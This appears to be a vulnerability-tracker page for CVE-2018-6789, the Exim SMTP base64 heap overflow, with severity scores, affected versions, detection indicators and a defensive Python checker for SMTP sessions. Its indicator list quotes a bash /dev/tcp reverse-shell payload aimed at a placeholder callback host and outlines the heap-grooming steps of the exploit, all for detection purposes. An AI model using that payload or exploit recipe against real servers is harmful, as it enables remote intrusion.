CVE-2018-6789
published 2018-02-08


Priority: P1 (96) · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability (due 2022-05-03)
Exploited in the wild
EPSS: 82.24% (99.6th percentile)
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.

Affected (8 ranges)

Vendor       Product        Version range                   Fixed in
canonical    ubuntu_linux
canonical    ubuntu_linux
canonical    ubuntu_linux
debian       debian_linux
debian       debian_linux
debian       debian_linux
debian       exim4          < exim4 4.90.1-1 (bookworm)     exim4 4.90.1-1 (bookworm)
exim         exim           < 4.90.1                        4.90.1

Detection & IOCs (extracted from sources)

command: AUTH PLAIN <crafted_base64_payload>
command: ${run{/usr/bin/setsid /bin/bash -c "/bin/bash --rcfile & /dev/tcp/<cb>/<cbport> 0>&1"}}
command: EHLO <8000-byte string>
  • Detect exploitation attempts by monitoring SMTP AUTH PLAIN commands sent to Exim on port 25 whose base64 argument is malformed (missing or manipulated '=' padding).
  • Alert on Exim SMTP sessions where an AUTH PLAIN payload contains Exim expansion strings such as '${run{...}}'; this indicates an attempt to turn the heap overflow into RCE via an ACL store-block overwrite.
  • Detect oversized EHLO arguments (8000+ bytes) in SMTP sessions targeting Exim; the exploit uses them to shape the heap layout.
  • Monitor for SMTP sessions that send many unrecognized or garbage commands (e.g., runs of 0xFF bytes) interleaved with AUTH PLAIN; this is heap grooming for the exploit.
  • Identify Exim versions earlier than 4.90.1 from the SMTP greeting banner; all of them are affected by CVE-2018-6789. The banner text is configurable, so a missing or altered version string is inconclusive, not evidence of a patched host.
  • Look for reverse-shell callbacks over /dev/tcp originating from a child of the Exim process; the exploit payload uses bash's /dev/tcp redirection for the callback shell.
  • The vulnerability is only exploitable if AUTH PLAIN (or another base64-consuming authentication mechanism) is advertised/enabled on the Exim SMTP listener. The public exploit checks for this and aborts if it is not available.
  • The one-byte heap overflow is in base64d(): the output buffer is sized as 3*(len/4)+1 bytes, which is one byte short when the input length is 4n+3 (a trailing three-character quantum with its '=' padding stripped), because the decoder still emits two bytes for that quantum. Rejecting improperly padded base64 in an SMTP-aware proxy or filter in front of Exim may therefore reduce exposure, but the fix is to upgrade to 4.90.1.
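The indicators above, as an added detection example that is not part of this page or of any Exim project code: a checker that walks a captured SMTP session and reports which rules fire, including the lower-confidence note when AUTH PLAIN was never advertised. The session at the bottom is constructed rather than captured, the 8000-byte EHLO and five-junk-command thresholds are assumptions taken from the list, and the `${run{id}}` payload is a harmless stand-in for a real expansion string.

```python
"""Indicator checker for CVE-2018-6789 over a captured SMTP session.

Added example; the session at the bottom is constructed and the thresholds
are assumptions taken from the indicator list above.
"""
import base64
import binascii
import re

FIXED_VERSION = (4, 90, 1)
BANNER_RE = re.compile(rb"^220[ -].*\bExim (\d+)\.(\d+)(?:\.(\d+))?")
SMTP_VERB_RE = re.compile(rb"^[A-Za-z]{4,8}(?: |$)")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")
EXPANSION_RE = re.compile(rb"\$\{\s*run\s*\{")   # ${run{...}}, the expansion item in the IOC


def exim_version(banner: bytes):
    """(major, minor, patch) parsed from a 220 greeting, or None if not Exim."""
    m = BANNER_RE.match(banner)
    if m is None:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())


def lenient_b64decode(arg: bytes) -> bytes:
    """Decode with whatever padding is missing, so an unpadded 4n+3 payload
    still yields the bytes the server-side decoder would have stored."""
    try:
        return base64.b64decode(arg + b"=" * (-len(arg) % 4))
    except binascii.Error:
        return b""


def analyze_session(session, ehlo_threshold=8000, garbage_threshold=5):
    """Apply the indicator rules to [(who, line), ...], who in {"S", "C"}.

    Returns a list of {"rule", "line", "detail"} findings, in session order.
    """
    findings = []
    auth_plain_advertised = False
    garbage = 0
    awaiting_payload = False        # AUTH PLAIN sent without an initial response

    def hit(rule, idx, detail):
        findings.append({"rule": rule, "line": idx, "detail": detail})

    for idx, (who, raw) in enumerate(session):
        line = raw.rstrip(b"\r\n")
        if who == "S":
            ver = exim_version(line)
            if ver is not None and ver < FIXED_VERSION:
                hit("exim_pre_4.90.1", idx, "banner advertises Exim %d.%d.%d" % ver)
            if line.upper().startswith((b"250-AUTH", b"250 AUTH")):
                auth_plain_advertised = b"PLAIN" in line.upper()
            continue

        upper = line.upper()
        payload = None
        if awaiting_payload:
            payload, awaiting_payload = line, False
        elif upper.startswith(b"AUTH PLAIN"):
            payload = line[len(b"AUTH PLAIN"):].strip() or None
            awaiting_payload = payload is None
        elif upper.startswith((b"EHLO ", b"HELO ")):
            if len(line) - 5 >= ehlo_threshold:
                hit("oversized_ehlo", idx, "%d-byte argument" % (len(line) - 5))
        elif not SMTP_VERB_RE.match(line) or any(b >= 0x80 for b in line):
            garbage += 1                # unrecognised or binary junk: heap grooming
            if garbage == garbage_threshold:
                hit("garbage_commands", idx, "%d junk commands so far" % garbage)

        if payload is None:
            continue
        suspicious = False
        if not B64_RE.match(payload) or len(payload) % 4:
            shape = "unpadded 4n+3 (overflow shape)" if len(payload) % 4 == 3 else "invalid base64"
            hit("malformed_auth_base64", idx, shape)
            suspicious = True
        if EXPANSION_RE.search(payload) or EXPANSION_RE.search(lenient_b64decode(payload)):
            hit("exim_expansion_in_auth", idx, "${run{...}} in AUTH PLAIN payload")
            suspicious = True
        if suspicious and not auth_plain_advertised:
            hit("auth_plain_not_advertised", idx, "lower confidence: exploit needs AUTH PLAIN enabled")
    return findings


# Constructed session, not a real capture. The payload is a harmless stand-in
# with its single '=' stripped so that its length is 4n+3.
PAYLOAD = base64.b64encode(b"\x00us\x00${run{id}}").rstrip(b"=")
_GROOMING = [pair for _ in range(6)
             for pair in (("C", b"\xff" * 200), ("S", b"500 unrecognized command"))]
SAMPLE_SESSION = [
    ("S", b"220 mail.example.test ESMTP Exim 4.89 Mon, 12 Feb 2018 10:00:00 +0000"),
    ("C", b"EHLO " + b"a" * 8000),
    ("S", b"250-mail.example.test Hello"),
    ("S", b"250-AUTH PLAIN"),
    ("S", b"250 HELP"),
] + _GROOMING + [
    ("C", b"AUTH PLAIN " + PAYLOAD),
    ("S", b"535 Incorrect authentication data"),
]

if __name__ == "__main__":
    for f in analyze_session(SAMPLE_SESSION):
        print(f["rule"], f["line"], f["detail"])
```

The payload check decodes leniently on purpose: the attacker's input is malformed by design, so a strict decoder would discard exactly the bytes that carry the expansion string. Feed the checker real sessions reassembled from a pcap as (direction, line) pairs; the version rule is only as good as the banner, which administrators can change.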

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
osv                       9.8     CRITICAL
vulncheck                 9.8     CRITICAL
cisa                      9.8     CRITICAL
vendor_debian             9.8     CRITICAL
vendor_redhat             9.8     CRITICAL